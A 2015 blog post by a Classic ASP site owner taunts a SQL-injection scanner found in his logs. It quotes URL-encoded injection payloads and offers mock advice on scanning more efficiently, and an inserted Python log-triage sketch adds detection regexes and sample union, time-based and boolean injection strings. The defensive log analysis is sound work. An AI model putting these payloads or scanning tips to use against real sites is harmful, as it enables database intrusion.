by   March 26 2015   
When you need to test your SQL Injection prevention scripts, it's always nice finding someone online that has all the newest and oldest lines in the book. You can't beat log reports unless you get in and actually delete them. I appreciate the effort Mr. TVDW.EU did. I didn't check to see if it was an open proxy, but I hope it was. You should cut down on the scan attempts. I typically ignore those under 20. I look at those over 100 but I write about those that scan over 7,000 times.

So how did I do? Did I pass your test?

SQL Injection vulnerabilities

I thought I would share some Classic ASP Injection Code tests. 

But after reviewing over 7,000 injection attempts I thought it might be better to help you design a better tester. 

I know you're just so into your VB that you had to test your new Injector on my oldest running ASP site. It's 19 years this year so SQL injection isn't something new. Just the players are new. 

Here's your information so you know that I know and to make sure you understand I log, log and log. Then I really do actually read the logs. 

5.79.68.161 is from Netherlands (NL) in region Western Europe
Input: 5.79.68.161
canonical name: tor-exit.server6.tvdw.eu
Registered Domain: tvdw.eu

Dear Mr. TVDW.EU, You're such a NOOB so my first tip to you on scanning for SQL Injection is to not scan the same folder twice. 

Example: 

/folder/file.asp?querystring:66%27%20or%201%3Dconvert%28int%2C%28select%20cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2"
/folder/file2.asp?querystring:66%27%20or%201%3Dconvert%28int%2Cchr%28114%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28109%29%7C%7Cchr%2848%29%7C%7Cchr%28118%29%7C%7Cchr%2851%29%7C%7Cchr%2895%29%7C%7Cchr%28104%29%7C%7Cchr%28118%29%7C%7Cchr%28106%29%7C%7Cchr%2895%29"

Unless you're talking about really old, sloppy programmers, the odds of finding a different connection link from different files within the same folder are very slim.

Now you did good on my login page. 

It's important to know if you're working with a GET or a POST.
If you had scanned beforehand you would have known.

Most of the attempts were from my internal redirect link, which might have confused your script. You might need to look at your scraping code to get it down; it seems you scraped some no-follow links, which is important because they just don't give you enough.


 

Overall, 7,417 SQL attempts in just about 9 hours, from 2015-03-26 05:33:58 to 2015-03-26 14:40:07, isn't smart. The other groups run 4 to 15 scans and move on. Why on earth would you want to risk being the "Search Bot" we all hate?

Don't scan more than you have to in order to see if you get any type of error. You're trolling for that 500 error and you should be reading the headers better. You would have noticed a few 301s and a couple of 404s in the mix. Some of the pages you have indexed haven't been online in over 2 years. So do a Page Hit 200 lookup script before you send out the big guns to test the SQL Injection scripts.

It's about planning and working smart. 
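A log-triage sketch for the approach described in this post (count SQL injection probes per source, note the status codes returned, apply the 20 / 100 / 7,000 thresholds), added here as an example and not the author's own logging code. The "ip status query" log format, the regex signatures, the `watch` band between 20 and 100 and all function names are assumptions; the sample lines are constructed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in an assumed "ip status query" format.
# 203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = """\
203.0.113.7 200 pgrt=folder%2Fdetails.asp%3Fsid%3D1996%20and%201%3D1
203.0.113.7 200 pgrt=folder%2Fdetails.asp%3Fsid%3D1996%27%20and%20%27x%27%3D%27y
203.0.113.7 200 pgrt=999999.9%20union%20all%20select%20null%2Cnull%2Cnull--
203.0.113.7 301 pgrt=folder%2Fdetails.asp%3Fsid%3D1996%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A17%27--
203.0.113.7 404 pgrt=convert%28int%2Cdb_name%28%29%29--
198.51.100.9 200 pgrt=folder%2Fdetails.asp%3Fsid%3D1996
"""

# Checked in order; the first match names the probe technique.
SIGNATURES = [
    ("time_based", re.compile(r"waitfor\s+delay|benchmark\s*\(")),
    ("union_probe", re.compile(r"union\s+(?:all\s+)?select")),
    ("error_based", re.compile(r"convert\s*\(\s*int|information_schema")),
    ("boolean_test", re.compile(r"\b(?:and|or)\s+['\"]?\w+['\"]?\s*[=<>]\s*['\"]?\w+")),
]
UNION_LIST = re.compile(r"union\s+(?:all\s+)?select\s+(.*?)(?:--|$)")


def classify(query):
    """Return the technique name for a URL-encoded query string, or None."""
    decoded = unquote_plus(query).lower()
    for name, rx in SIGNATURES:
        if rx.search(decoded):
            return name
    return None


def union_columns(query):
    """Number of items in a UNION SELECT list (column-count guessing), else 0."""
    m = UNION_LIST.search(unquote_plus(query).lower())
    return len(m.group(1).split(",")) if m else 0


def triage_level(attempts):
    """Thresholds from the post; the 20-100 'watch' band is an assumption."""
    if attempts > 7000:
        return "write-up"
    if attempts > 100:
        return "review"
    if attempts < 20:
        return "ignore"
    return "watch"


def summarize(log_text):
    """Group injection probes by source IP with technique and status tallies."""
    per_ip = defaultdict(lambda: {"attempts": 0, "techniques": Counter(),
                                  "statuses": Counter(), "max_union_cols": 0})
    for line in log_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue  # malformed line
        ip, status, query = parts
        technique = classify(query)
        if technique is None:
            continue  # ordinary request, not a probe
        entry = per_ip[ip]
        entry["attempts"] += 1
        entry["techniques"][technique] += 1
        entry["statuses"][status] += 1
        entry["max_union_cols"] = max(entry["max_union_cols"], union_columns(query))
    return {ip: {**e, "level": triage_level(e["attempts"])} for ip, e in per_ip.items()}


if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(ip, info["level"], dict(info["techniques"]), dict(info["statuses"]))
```

A source whose probes keep drawing 301 and 404 responses, or whose `max_union_cols` climbs request after request, is an automated scanner working from a stale index rather than a person browsing.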

When I test, I know the coder, I read about him at XtremeComputer.Com and at MySmallCLoud.Com, it's important to know the coders that learned M_ and sp_ and those that learned MURRAY_ and NOOB_ because if it's not standard, if it's not corporate policy it's very difficult to break. 

Follow this link, you'll get a better idea of who I am. 

 ASP Classic Programming

You can also follow my XCtM Project or my Handyman Sites which all use the same code base. 

 
